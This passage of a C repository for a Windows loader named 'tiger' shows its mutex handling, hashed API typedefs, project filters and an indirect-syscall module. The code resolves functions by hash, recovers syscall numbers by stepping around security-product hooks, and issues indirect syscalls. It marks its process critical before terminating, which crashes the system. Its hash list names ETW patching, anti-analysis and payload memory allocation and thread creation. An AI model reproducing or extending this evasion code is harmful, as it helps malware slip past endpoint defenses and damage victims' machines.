| BOOL res = FALSE; 15 | 16 | if (!ObtainSyscall(NTCREATEMUTANT_HASH, &_G_NTFUNC.NtCreateMutant)) { 17 | #ifdef DEBUG 18 | PRINTA("[!] Failed In Obtaining The Syscall Number Of NtCreateMutant\n"); 19 | #endif 20 | res = FALSE; 21 | } 22 | 23 | if (!ObtainSyscall(NTRELEASEMUTANT_HASH, &_G_NTFUNC.NtReleaseMutant)) { 24 | #ifdef DEBUG 25 | PRINTA("[!] Failed In Obtaining The Syscall Number Of NtReleaseMutant\n"); 26 | #endif 27 | res = FALSE; 28 | } 29 | 30 | if (!ObtainSyscall(NTCLOSE_HASH, &_G_NTFUNC.NtClose)) { 31 | #ifdef DEBUG 32 | PRINTA("[!] Failed In Obtaining The Syscall Number Of NtClose\n"); 33 | #endif 34 | res = FALSE; 35 | } 36 | 37 | if (res == FALSE) { 38 | return -1; 39 | } 40 | else { 41 | res = TRUE; 42 | } 43 | 44 | return res; 45 | } 46 | 47 | HANDLE _CreateMutant(WCHAR* wMutantName) { 48 | 49 | t_RtlSetProcessIsCritical SetCriticalProcess = 50 | (t_RtlSetProcessIsCritical)_GetProcAddress(_GetModuleHandle(NTDLL_HASH), RTLSETPROCESSISCRITICAL_HASH); 51 | t_RtlInitUnicodeString RtlInitUnicodeString = (t_RtlInitUnicodeString)_GetProcAddress(_GetModuleHandle(NTDLL_HASH), RTLINITUNICODESTRING_HASH); 52 | t_TerminateProcess TerminateProcess = (t_TerminateProcess)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), TERMINTATEPROCESS_HASH); 53 | 54 | HANDLE hMutant = NULL; 55 | NTSTATUS STATUS = NULL; 56 | 57 | if (InitialiaseNTSyscalls() == FALSE) { 58 | return NULL; 59 | } 60 | 61 | OBJECT_ATTRIBUTES OA = {0}; 62 | UNICODE_STRING mutant = {0}; 63 | 64 | // Create the unicode_string object 65 | RtlInitUnicodeString(&mutant, wMutantName); 66 | 67 | // Set the values to the OA structure and initialise it 68 | InitializeObjectAttributes(&OA, &mutant, (OBJ_CASE_INSENSITIVE | OBJ_EXCLUSIVE), NULL, NULL); 69 | 70 | SET_SYSCALL(_G_NTFUNC.NtCreateMutant); 71 | STATUS = RunSyscall(&hMutant, SYNCHRONIZE, &OA, TRUE); 72 | if (STATUS == STATUS_ACCESS_VIOLATION) { 73 | #ifdef DEBUG 74 | PRINTA("[-] Mutant Creation Failed With Error: 0x%0.8X \n", STATUS); 75 | #endif 76 | SetCriticalProcess(TRUE, NULL, FALSE); 77 | TerminateProcess(NtCurrentProcess(), -1); 78 | return -1; 79 | } 80 | else if (STATUS == STATUS_OBJECT_NAME_COLLISION || STATUS == STATUS_OBJECT_NAME_EXISTS) { 81 | #ifdef DEBUG 82 | PRINTA("[-] Mutant already exists: 0x%0.8X \n", STATUS); 83 | #endif 84 | SetCriticalProcess(TRUE, NULL, FALSE); 85 | TerminateProcess(NtCurrentProcess(), -1); 86 | return -1; 87 | } 88 | else if (STATUS == STATUS_SUCCESS) { 89 | #ifdef DEBUG 90 | PRINTA("[+] Mutant Success: 0x%0.8X \n", STATUS); 91 | #endif 92 | } 93 | else { 94 | #ifdef DEBUG 95 | PRINTA("[!] Something went wrong: 0x%0.8X \n", STATUS); 96 | #endif 97 | SetCriticalProcess(TRUE, NULL, FALSE); 98 | TerminateProcess(NtCurrentProcess(), -1); 99 | return -1; 100 | } 101 | #ifdef DEBUG 102 | PRINTA("\t - Mutant Handle -> 0x%p\n", hMutant); 103 | #endif 104 | 105 | if (hMutant == NULL) { 106 | SetCriticalProcess(TRUE, NULL, FALSE); 107 | TerminateProcess(NtCurrentProcess(), -1); 108 | return -1; 109 | } 110 | 111 | return hMutant; 112 | } 113 | 114 | BOOL _DestroyMutant(HANDLE hMutant) { 115 | 116 | t_RtlSetProcessIsCritical SetCriticalProcess = 117 | (t_RtlSetProcessIsCritical)_GetProcAddress(_GetModuleHandle(NTDLL_HASH), RTLSETPROCESSISCRITICAL_HASH); 118 | t_TerminateProcess TerminateProcess = (t_TerminateProcess)_GetProcAddress(_GetModuleHandle(KERNEL32_HASH), TERMINTATEPROCESS_HASH); 119 | 120 | NTSTATUS STATUS = NULL; 121 | 122 | SET_SYSCALL(_G_NTFUNC.NtReleaseMutant); 123 | if ((STATUS = RunSyscall(hMutant, NULL)) == 0x00){ 124 | #ifdef DEBUG 125 | PRINTA("[+] Mutant Released Successfully: 0x%0.8X \n", STATUS); 126 | #endif 127 | } 128 | else { 129 | SetCriticalProcess(TRUE, NULL, FALSE); 130 | TerminateProcess(NtCurrentProcess(), -1); 131 | return FALSE; 132 | } 133 | 134 | SET_SYSCALL(_G_NTFUNC.NtClose); 135 | if ((STATUS = RunSyscall(hMutant)) != 0x00) { 136 | SetCriticalProcess(TRUE, NULL, FALSE); 137 | TerminateProcess(NtCurrentProcess(), -1); 138 | return FALSE; 139 | } 140 | else { 141 | #ifdef DEBUG 142 | PRINTA("[+] Mutant Handle Closed Successfully: 0x%0.8X \n", STATUS); 143 | #endif 144 | } 145 | 146 | return TRUE; 147 | 148 | } -------------------------------------------------------------------------------- /tiger/typedefs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Defined in main.c for the first loop for IAT camoflague 4 | #define MLP0 5 5 | 6 | // Defined for the loops in IAT camoflague for benign behaviour 7 | #define LP1 5 8 | #define LP2 8196 9 | 10 | // Wait time for NtDelayExecution() and sleep behaviour 11 | // example: -10000000 = 1sec relative to current :) 12 | // Used by NtDelayExecution() 13 | #define WAITTIMER -20000000 14 | 15 | // Module hashes need to be in UNICODE format so adjust the hashes tool 16 | // Hashes of modules 17 | #define KERNEL32_HASH 0xffffffff330c7795 18 | #define NTDLL_HASH 0xffffffff7808a3d2 19 | 20 | // Hashes of WinAPI functions 21 | #define CREATEMUTEX_HASH 0xffffffff2d789102 22 | #define RELEASEMUTEX_HASH 0xffffffff27ef86df 23 | #define GETLASTERROR_HASH 0xffffffffd2e536b7 24 | #define CLOSEHANDLE_HASH 0xffffffffb09315f4 25 | #define TERMINTATEPROCESS_HASH 0xffffffffab40bf8d 26 | #define FINDRESOURCEW_HASH 0xffffffffcad4de2b 27 | #define LOADRESOURCE_HASH 0xffffffff92ffa82f 28 | #define LOCKRESOURCE_HASH 0xffffffff49b3b7c3 29 | #define SIZEOFRESOURCE_HASH 0xffffffffc319fa22 30 | #define FREERESOURCE_HASH 0xffffffff033a7dbb 31 | #define GETTICKCOUNT64_HASH 0xffffffff517fef08 32 | #define VIRTUALPROTECT_HASH 0xffffffff10066f2f 33 | #define RTLSECUREZEROMEMORY_HASH 0xffffffff8d3c4b0c 34 | 35 | // Hashes of NTDLL functions 36 | #define NTALLOCATEVIRTUALMEMORY_HASH 0xffffffffe0762feb 37 | #define NTPROTECTVIRTUALMEMORY_HASH 0xffffffff5c2d1a97 38 | #define NTCREATETHREADEX_HASH 0xffffffff2073465a 39 | #define NTWAITFORSINGLEOBJECT_HASH 0xffffffffdd554681 40 | #define RTLSETPROCESSISCRITICAL_HASH 0xffffffff26f94a0b 41 | #define NTDELAYEXECUTION_HASH 0xfffffffff5a86278 42 | #define NTCREATEMUTANT_HASH 0xffffffffce8ff6b0 43 | #define NTRELEASEMUTANT_HASH 0xffffffff845c7d53 44 | #define NTOPENMUTANT_HASH 0xffffffffb34696b2 45 | #define NTCLOSE_HASH 0xffffffff0d09c750 46 | #define RTLINITUNICODESTRING_HASH 0xffffffff7aa7b69b 47 | #define NTGETCONTEXTTHREAD_HASH 0xffffffffd3534981 48 | #define NTSETCONTEXTTHREAD_HASH 0xffffffffe1453b98 49 | #define ETWEVENTWRITE_HASH 0xffffffff0d109b8c 50 | #define ETWEVENTWRITEFULL_HASH 0xffffffff22f74be0 51 | #define RTLADDVECTOREDEXCEPTIONHANDLER_HASH 0xffffffffbaab0208 52 | #define RTLREMOVEVECTOREDEXCEPTIONHANDLER_HASH 0xfffffffffed80136 53 | 54 | 55 | // Pseudo handles to current process & thread 56 | #define NtCurrentProcess() ((HANDLE)-1) // Return the pseudo handle for the current process 57 | #define NtCurrentThread() ((HANDLE)-2) // Return the pseudo handle for the current thread 58 | 59 | // Hashes of WinAPI Function 60 | typedef HANDLE(WINAPI* t_CreateMutexW)( 61 | _In_opt_ LPSECURITY_ATTRIBUTES lpMutexAttributes, 62 | _In_ BOOL bInitialOwner, 63 | _In_opt_ LPCWSTR lpName 64 | ); 65 | 66 | typedef BOOL(WINAPI* t_ReleaseMutex)( 67 | _In_ HANDLE hMutex 68 | ); 69 | 70 | typedef _Check_return_ _Post_equals_last_error_ DWORD (WINAPI* t_GetLastError)(VOID); 71 | 72 | typedef BOOL (WINAPI* t_CloseHandle)(_In_ _Post_ptr_invalid_ HANDLE hObject); 73 | 74 | typedef BOOL (WINAPI* t_TerminateProcess)( 75 | _In_ HANDLE hProcess, 76 | _In_ UINT uExitCode 77 | ); 78 | 79 | typedef HRSRC(WINAPI* t_FindResourceW)( 80 | _In_opt_ HMODULE hModule, 81 | _In_ LPCWSTR lpName, 82 | _In_ LPCWSTR lpType 83 | ); 84 | 85 | typedef HGLOBAL(WINAPI* t_LoadResource)( 86 | _In_opt_ HMODULE hModule, 87 | _In_ HRSRC hResInfo 88 | ); 89 | 90 | typedef LPVOID(WINAPI* t_LockResource)( 91 | _In_ HGLOBAL hResData 92 | ); 93 | 94 | typedef DWORD(WINAPI* t_SizeofResource)( 95 | _In_opt_ HMODULE hModule, 96 | _In_ HRSRC hResInfo 97 | ); 98 | 99 | typedef BOOL(WINAPI* t_FreeResource)( 100 | _In_ HGLOBAL hResData 101 | ); 102 | 103 | typedef ULONGLONG (WINAPI* t_GetTickCount64)(); 104 | 105 | typedef PVOID (WINAPI* t_RtlSecureZeroMemory)( 106 | _Out_ PVOID ptr, 107 | _In_ SIZE_T cnt 108 | ); 109 | 110 | typedef BOOL(WINAPI* t_VirtualProtect)( 111 | _In_ LPVOID lpAddress, 112 | _In_ SIZE_T dwSize, 113 | _In_ DWORD flNewProtect, 114 | _Out_ PDWORD lpflOldProtect 115 | ); 116 | 117 | // Typedefs of NTDLL functions 118 | typedef NTSTATUS (NTAPI* t_RtlSetProcessIsCritical)( 119 | BOOLEAN bNew, // new setting for process 120 | BOOLEAN* pbOld, // pointer which receives old setting (can be null) 121 | BOOLEAN bNeedScb // need system critical breaks 122 | ); 123 | 124 | typedef NTSTATUS (NTAPI* t_NtDelayExecution)( 125 | BOOLEAN Alertable, 126 | PLARGE_INTEGER DelayInterval 127 | ); 128 | 129 | typedef void (NTAPI* t_RtlInitUnicodeString)( 130 | _Out_ PUNICODE_STRING DestinationString, 131 | _In_opt_ PCWSTR SourceString 132 | ); 133 | 134 | typedef NTSTATUS (NTAPI* t_RtlInitUnicodeStringEx)( 135 | _Out_ PUNICODE_STRING DestinationString, 136 | _In_opt_ PCWSTR SourceString 137 | ); 138 | 139 | typedef NTSTATUS(NTAPI* t_NtCreateMutant)( 140 | OUT PHANDLE MutantHandle, 141 | IN ACCESS_MASK DesiredAccess, 142 | IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes, 143 | IN BOOLEAN InitialOwner 144 | ); 145 | 146 | typedef PVOID (WINAPI* t_RtlAddVectoredExceptionHandler)( 147 | ULONG First, 148 | PVECTORED_EXCEPTION_HANDLER Handler 149 | ); 150 | 151 | typedef ULONG (WINAPI* t_RtlRemoveVectoredExceptionHandler)( 152 | PVOID hHandler 153 | ); -------------------------------------------------------------------------------- /tiger/tiger.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | {7bf18ddf-89c3-47b5-b0bc-8430ffb4c804} 18 | 19 | 20 | {15fb43aa-ea22-4ce0-9404-7612faad8594} 21 | 22 | 23 | {a72ad9cd-3200-4519-9289-f6fe5349edc8} 24 | 25 | 26 | {78d90ea6-3859-40ef-a668-890bfdac7cf6} 27 | 28 | 29 | {2b30b5b2-17fa-4b65-b6bc-775bfa00bdf8} 30 | 31 | 32 | {eb290902-75ad-40ef-b61d-7afb5cb382fd} 33 | 34 | 35 | {8d646cd0-062a-4d0f-b2f5-e9f64c8d963f} 36 | 37 | 38 | {34ab1ee7-f7a9-4a93-bb52-1dbf4675e5a4} 39 | 40 | 41 | {186d90b7-ea12-45c0-a7a4-690a5cbace7d} 42 | 43 | 44 | {f0e92887-58b4-44db-a4ea-3660b57e6c0a} 45 | 46 | 47 | {fb5e50ae-704c-40cd-a5f1-72b5dbcd830f} 48 | 49 | 50 | {a2565f94-7caa-4f36-a8eb-7f894dbf6f6c} 51 | 52 | 53 | {68da95b5-2fd5-4ef0-b82f-332969fb8109} 54 | 55 | 56 | {f938596b-067a-4366-82e6-80e5ce370c54} 57 | 58 | 59 | 60 | 61 | Source Files 62 | 63 | 64 | Source Files 65 | 66 | 67 | Source Files 68 | 69 | 70 | Source Files 71 | 72 | 73 | Source Files 74 | 75 | 76 | Source Files\anti-analysis 77 | 78 | 79 | Source Files\anti-analysis 80 | 81 | 82 | Source Files\encryption 83 | 84 | 85 | Source Files\encryption 86 | 87 | 88 | Source Files\ETW 89 | 90 | 91 | Source Files\hooks 92 | 93 | 94 | Source Files\hooks 95 | 96 | 97 | Source Files\hooks 98 | 99 | 100 | Source Files\IAT 101 | 102 | 103 | Source Files\mutex 104 | 105 | 106 | 107 | 108 | Header Files 109 | 110 | 111 | Header Files 112 | 113 | 114 | Header Files 115 | 116 | 117 | Header Files 118 | 119 | 120 | Header Files 121 | 122 | 123 | Header Files 124 | 125 | 126 | Header Files 127 | 128 | 129 | Header Files 130 | 131 | 132 | Header Files 133 | 134 | 135 | Header Files\anti-analysis 136 | 137 | 138 | Header Files\anti-analysis 139 | 140 | 141 | Header Files\encryption 142 | 143 | 144 | Header Files\encryption 145 | 146 | 147 | Header Files\ETW 148 | 149 | 150 | Header Files\hooks 151 | 152 | 153 | Header Files\hooks 154 | 155 | 156 | Header Files\hooks 157 | 158 | 159 | Header Files\IAT 160 | 161 | 162 | Header Files\mutex 163 | 164 | 165 | Header Files\debug 166 | 167 | 168 | 169 | 170 | Source Files 171 | 172 | 173 | Source Files\anti-analysis\anti-disass-asm 174 | 175 | 176 | 177 | 178 | Resource Files 179 | 180 | 181 | 182 | 183 | Resource Files 184 | 185 | 186 | -------------------------------------------------------------------------------- /tiger/indirect_syscall.c: -------------------------------------------------------------------------------- 1 | #include "indirect_syscall.h" 2 | #include "debug/debug.h" 3 | 4 | #define RANGE 500 5 | #define UP -32 6 | #define DOWN 32 7 | 8 | VOID SetSSN(DWORD dwSSN, PVOID pRandSyscallAddress); 9 | LONG RunSyscall(); 10 | 11 | NTDLL_STRUCT _G_NtdllConf; 12 | 13 | BOOL ObtainSyscall(IN DWORD64 dwSysHash, OUT PNTSYSCALL pNtSys) { 14 | 15 | // Initialise the NTDLL structure 16 | if (!_G_NtdllConf.uModule) { 17 | if (!InitNtdllStruct()) { 18 | return FALSE; 19 | } 20 | //PRINTA("[+] Initialised the NTDLL structure !\n"); 21 | } 22 | //PRINTA("[+] Got base address of NTDLL -> %#p\n", (PVOID)_G_NtdllConf.uModule); 23 | 24 | // if no hash value was specified 25 | if (dwSysHash != NULL) { 26 | pNtSys->dwSyscallHash = dwSysHash; 27 | //PRINTA("[!] dwSyscallHash -> %llx\n", pNtSys->dwSyscallHash); 28 | } 29 | else { 30 | return FALSE; 31 | } 32 | 33 | size_t index = 0; 34 | for (index; index < _G_NtdllConf.dwNumberOfNames; index++) { 35 | 36 | PCHAR pFunctionName = (PCHAR)(_G_NtdllConf.uModule + _G_NtdllConf.pdwArrayOfNames[index]); 37 | PVOID pFunctionAddr = (PVOID)(_G_NtdllConf.uModule + _G_NtdllConf.pdwArrayOfAddresses[_G_NtdllConf.pwArrayOfOrdinals[index]]); 38 | /* 39 | PRINTA("[*] SYSCALL FUNCTION INFO -> \n\ 40 | \t\t- FUNCTION NAME -> %s\n\ 41 | \t\t- FUNCTION ADDRESS -> %#p\n", pFunctionName, pFunctionAddr); 42 | //getchar(); 43 | */ 44 | if (CRC32B(pFunctionName) == dwSysHash) { 45 | 46 | // Save the matched function address 47 | pNtSys->pSyscallAddress = pFunctionAddr; 48 | 49 | if (*((PBYTE)pFunctionAddr) == 0x4C 50 | && *((PBYTE)pFunctionAddr + 1) == 0x8B 51 | && *((PBYTE)pFunctionAddr + 2) == 0xD1 52 | && *((PBYTE)pFunctionAddr + 3) == 0xB8 53 | && *((PBYTE)pFunctionAddr + 6) == 0x00 54 | && *((PBYTE)pFunctionAddr + 7) == 0x00) { 55 | 56 | BYTE high = *((PBYTE)pFunctionAddr + 5); 57 | BYTE low = *((PBYTE)pFunctionAddr + 4); 58 | pNtSys->dwSSN = (high << 8) | low; 59 | break; // break for-loop [i] 60 | } 61 | 62 | // if hooked - scenario 1 63 | if (*((PBYTE)pFunctionAddr) == 0xE9) { 64 | 65 | for (WORD idx = 1; idx <= RANGE; idx++) { 66 | // check neighboring syscall down 67 | if (*((PBYTE)pFunctionAddr + idx * DOWN) == 0x4C 68 | && *((PBYTE)pFunctionAddr + 1 + idx * DOWN) == 0x8B 69 | && *((PBYTE)pFunctionAddr + 2 + idx * DOWN) == 0xD1 70 | && *((PBYTE)pFunctionAddr + 3 + idx * DOWN) == 0xB8 71 | && *((PBYTE)pFunctionAddr + 6 + idx * DOWN) == 0x00 72 | && *((PBYTE)pFunctionAddr + 7 + idx * DOWN) == 0x00) { 73 | 74 | BYTE high = *((PBYTE)pFunctionAddr + 5 + idx * DOWN); 75 | BYTE low = *((PBYTE)pFunctionAddr + 4 + idx * DOWN); 76 | pNtSys->dwSSN = (high << 8) | low - idx; 77 | break; // break for-loop [idx] 78 | } 79 | // check neighboring syscall up 80 | if (*((PBYTE)pFunctionAddr + idx * UP) == 0x4C 81 | && *((PBYTE)pFunctionAddr + 1 + idx * UP) == 0x8B 82 | && *((PBYTE)pFunctionAddr + 2 + idx * UP) == 0xD1 83 | && *((PBYTE)pFunctionAddr + 3 + idx * UP) == 0xB8 84 | && *((PBYTE)pFunctionAddr + 6 + idx * UP) == 0x00 85 | && *((PBYTE)pFunctionAddr + 7 + idx * UP) == 0x00) { 86 | 87 | BYTE high = *((PBYTE)pFunctionAddr + 5 + idx * UP); 88 | BYTE low = *((PBYTE)pFunctionAddr + 4 + idx * UP); 89 | pNtSys->dwSSN = (high << 8) | low + idx; 90 | break; // break for-loop [idx] 91 | } 92 | } 93 | } 94 | 95 | // if hooked - scenario 2 96 | if (*((PBYTE)pFunctionAddr + 3) == 0xE9) { 97 | 98 | for (WORD idx = 1; idx <= RANGE; idx++) { 99 | // check neighboring syscall down 100 | if (*((PBYTE)pFunctionAddr + idx * DOWN) == 0x4C 101 | && *((PBYTE)pFunctionAddr + 1 + idx * DOWN) == 0x8B 102 | && *((PBYTE)pFunctionAddr + 2 + idx * DOWN) == 0xD1 103 | && *((PBYTE)pFunctionAddr + 3 + idx * DOWN) == 0xB8 104 | && *((PBYTE)pFunctionAddr + 6 + idx * DOWN) == 0x00 105 | && *((PBYTE)pFunctionAddr + 7 + idx * DOWN) == 0x00) { 106 | 107 | BYTE high = *((PBYTE)pFunctionAddr + 5 + idx * DOWN); 108 | BYTE low = *((PBYTE)pFunctionAddr + 4 + idx * DOWN); 109 | pNtSys->dwSSN = (high << 8) | low - idx; 110 | break; // break for-loop [idx] 111 | } 112 | // check neighboring syscall up 113 | if (*((PBYTE)pFunctionAddr + idx * UP) == 0x4C 114 | && *((PBYTE)pFunctionAddr + 1 + idx * UP) == 0x8B 115 | && *((PBYTE)pFunctionAddr + 2 + idx * UP) == 0xD1 116 | && *((PBYTE)pFunctionAddr + 3 + idx * UP) == 0xB8 117 | && *((PBYTE)pFunctionAddr + 6 + idx * UP) == 0x00 118 | && *((PBYTE)pFunctionAddr + 7 + idx * UP) == 0x00) { 119 | 120 | BYTE high = *((PBYTE)pFunctionAddr + 5 + idx * UP); 121 | BYTE low = *((PBYTE)pFunctionAddr + 4 + idx * UP); 122 | pNtSys->dwSSN = (high << 8) | low + idx; 123 | break; // break for-loop [idx] 124 | } 125 | } 126 | } 127 | 128 | break; // break for-loop [i] 129 | 130 | } 131 | 132 | } 133 | 134 | // ---------------------- INDIRECT SYSCALL --------------------------- 135 | // check if still have a SYSCALL address 136 | if (!pNtSys->pSyscallAddress) { 137 | return FALSE; 138 | } 139 | 140 | // looking somewhere random (0xFF byte away from the syscall address) 141 | ULONG_PTR uFuncAddress = (ULONG_PTR)pNtSys->pSyscallAddress + 0xFF; 142 | 143 | // getting the 'syscall' instruction of another syscall function 144 | DWORD z = 0, x = 1; 145 | for (z, x; z <= RANGE; z++, x++) { 146 | if (*((PBYTE)uFuncAddress + z) == 0x0F && *((PBYTE)uFuncAddress + x) == 0x05) { 147 | pNtSys->pRandSyscallAddress = ((ULONG_PTR)uFuncAddress + z); 148 | break; // break for-loop [x & z] 149 | } 150 | } 151 | 152 | // checking if all NT_SYSCALL's (pNtSys) element are initialized 153 | if (pNtSys->dwSSN != NULL && 154 | pNtSys->pSyscallAddress != NULL && 155 | pNtSys->dwSyscallHash != NULL && 156 | pNtSys->pRandSyscallAddress != NULL) 157 | { 158 | //PRINTA("[+] All elements of pNtSys struct populated !\n"); 159 | return TRUE; 160 | } 161 | else { 162 | return FALSE; 163 | } 164 | } 165 | 166 | BOOL InitNtdllStruct(void) { 167 | 168 | //Obtain the PEB offset 169 | PPEB pPEB = (PEB*)__readgsqword(0x60); 170 | if (!pPEB || pPEB->OSMajorVersion != 0xA) { 171 | return FALSE; 172 | } 173 | 174 | // getting ntdll.dll module (skipping our local image element) 175 | PLDR_DATA_TABLE_ENTRY pLdr = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pPEB->LdrData->InMemoryOrderModuleList.Flink->Flink - 0x10); 176 | 177 | ULONG_PTR NtdllBase = (ULONG_PTR)pLdr->DllBase; 178 | if (NtdllBase == NULL) { 179 | return FALSE; 180 | } 181 | 182 | // fetching the dos header of ntdll 183 | PIMAGE_DOS_HEADER ImgDosHdr = (PIMAGE_DOS_HEADER)NtdllBase; 184 | if (ImgDosHdr->e_magic != IMAGE_DOS_SIGNATURE) { 185 | return FALSE; 186 | } 187 | 188 | // fetching the nt headers of ntdll 189 | PIMAGE_NT_HEADERS ImgNtHdrs = (PIMAGE_NT_HEADERS)(NtdllBase + ImgDosHdr->e_lfanew); 190 | if (ImgNtHdrs->Signature != IMAGE_NT_SIGNATURE) 191 | return FALSE; 192 | 193 | // obtain the IMAGE_EXPORT_DIRECTORY address 194 | PIMAGE_EXPORT_DIRECTORY ImgExpDir = 195 | (PIMAGE_EXPORT_DIRECTORY)(NtdllBase + ImgNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 196 | if (!ImgExpDir) { 197 | return FALSE; 198 | } 199 | 200 | _G_NtdllConf.uModule = NtdllBase; 201 | _G_NtdllConf.dwNumberOfNames = ImgExpDir->NumberOfNames; 202 | _G_NtdllConf.pdwArrayOfNames = (PDWORD)(NtdllBase + ImgExpDir->AddressOfNames); 203 | _G_NtdllConf.pdwArrayOfAddresses = (PDWORD)(NtdllBase + ImgExpDir->AddressOfFunctions); 204 | _G_NtdllConf.pwArrayOfOrdinals = (PDWORD)(NtdllBase + ImgExpDir->AddressOfNameOrdinals); 205 | 206 | // checking everything went fine above 207 | if (!_G_NtdllConf.uModule || 208 | !_G_NtdllConf.dwNumberOfNames || 209 | !_G_NtdllConf.pdwArrayOfNames || 210 | !_G_NtdllConf.pdwArrayOfAddresses || 211 | !_G_NtdllConf.pwArrayOfOrdinals) 212 | { 213 | return FALSE; 214 | } 215 | else { 216 | return TRUE; 217 | } 218 | 219 | } -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 